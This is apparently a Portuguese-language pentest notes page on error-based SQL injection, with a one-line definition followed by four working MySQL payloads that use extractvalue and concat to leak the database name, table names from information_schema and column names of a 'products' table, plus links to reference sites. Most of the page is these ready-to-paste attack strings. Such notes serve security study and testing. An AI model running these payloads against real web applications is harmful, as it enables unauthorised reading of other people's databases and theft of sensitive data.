SQL Injection Error Based

SQL Injection Error Based é uma vulnerabilidade aonde o atacante usa mensagens de erro do banco de dados para extrair ou inferir dados sensíveis, mesmo em cenários de injeção cega

%' and extractvalue("teste",concat(0x0a,(select database()))); -- -

%' and extractvalue("teste",concat(0x0a,(select table_name from information_schema.tables where table_schema='cs' limit 0,1))); -- -

%' and extractvalue("teste",concat(0x0a,(select table_name from information_schema.tables where table_schema='cs' limit 1,1))); -- -

%' and extractvalue("teste",concat(0x0a,(select column_name from information_schema.columns where table_name='products' limit 0,1))); -- -

LogoNetSPI SQL Injection Wikinetspi
LogoWhat is SQL Injection? Tutorial & Examples | Web Security AcademyWebSecAcademy
PreviousBlind SQL InjectionNextSQLmap automação

Last updated